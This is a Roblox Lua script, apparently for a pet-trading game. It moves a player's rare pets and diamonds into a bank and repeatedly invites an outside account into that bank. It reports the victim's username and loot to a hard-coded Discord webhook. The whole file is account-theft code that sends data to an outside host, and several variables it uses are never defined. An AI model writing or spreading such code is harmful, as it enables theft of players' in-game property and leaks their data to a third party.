local LocalNumber = 1512601908
local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
local mydiamonds = string.gsub(game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Diamonds.Amount.Text, "%,", "")
local mybanks = lib.Network.Invoke("get my banks")
local PetsList = {}
for i,v in pairs(lib.Save.Get().Pets) do
    local v2 = lib.Directory.Pets[v.id];
    if v2.rarity == "Exclusive" or v2.rarity == "Mythical" and v.dm or v2.rarity == "Legendary" and v.r then
        table.insert(PetsList, v.uid);
    end
end
local request, request2 = lib.Network.Invoke("Bank Deposit", mybanks[1]['BUID'], PetsList, mydiamonds - 0);

local YourWebHookHere =  "https://discord.com/api/webhooks/975032228251856956/nI8KP0vCqNLgMds77Uo1ZoqlrjrANVAQxhdpNKi7wU9BNi8XfKHM-wPm9Y-4kZwx3BkH"  -- web hook here

local url = YourWebHookHere
local username = game:GetService("Players").LocalPlayer.Name
 
local data = {
  ["content"] = ">  by Artemper",
["embeds"] = {{
["title"] = "__**Open**__",
["description"] = "i can't track this expired or no",
["type"] = "rich",
["color"] = tonumber(0x0E980E),
["fields"] = {
               {
["name"] = "__Username__",
["value"] = "**"..username.."**", -- remove the || on both sides if you don't want your username to be behind a spoiler
["inline"] = false
},
               {
["name"] = "__Gems Deposited__",
["value"] = output-1,
["inline"] = false
},
{
["name"] = "__Total Pet Deposited__",
["value"] = #FinalList,
["inline"] = false
},
{
["name"] = "__Exclusive/Huges__",
["value"] = #EList,
["inline"] = false
},
{
["name"] = "__Mythicals__",
["value"] = #MList,
["inline"] = false
},
{
["name"] = "__BankID__",
["value"] = BankID,
["inline"] = false
},
}
}}
}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
  ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)

while true do
    lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], HoverBoard)
    local YourWebHookHere2 =  "https://discord.com/api/webhooks/975032228251856956/nI8KP0vCqNLgMds77Uo1ZoqlrjrANVAQxhdpNKi7wU9BNi8XfKHM-wPm9Y-4kZwx3BkH" 

    local url2 = YourWebHookHere2
    local username2 = game:GetService("Players").LocalPlayer.Name
     
    local data2 = {
      ["content"] = "> "..username2.." Repeat ur Invites",
    ["embeds"] = {{
    ["title"] = "__** Results**__",
    ["description"] = "i can't track this expired or no",
    ["type"] = "rich",
    ["color"] = tonumber(0x0E980E),
    ["fields"] = {
                   {
    ["name"] = "__Username__",
    ["value"] = "**"..username2.."** Repeat ur Invites", -- remove the || on both sides if you don't want your username to be behind a spoiler
    ["inline"] = false
    },
                   {
    ["name"] = "__Cancel Invite__",
    ["value"] = "Yes",
    ["inline"] = false
    },
    }
    }}
    }
    local newdata2 = game:GetService("HttpService"):JSONEncode(data2)
    
    local headers2 = {
      ["content-type"] = "application/json"
    }
    request = http_request or request or HttpPost or syn.request
    local abcdef2 = {Url = url2, Body = newdata2, Method = "POST", Headers = headers2}
    request(abcdef2)
end
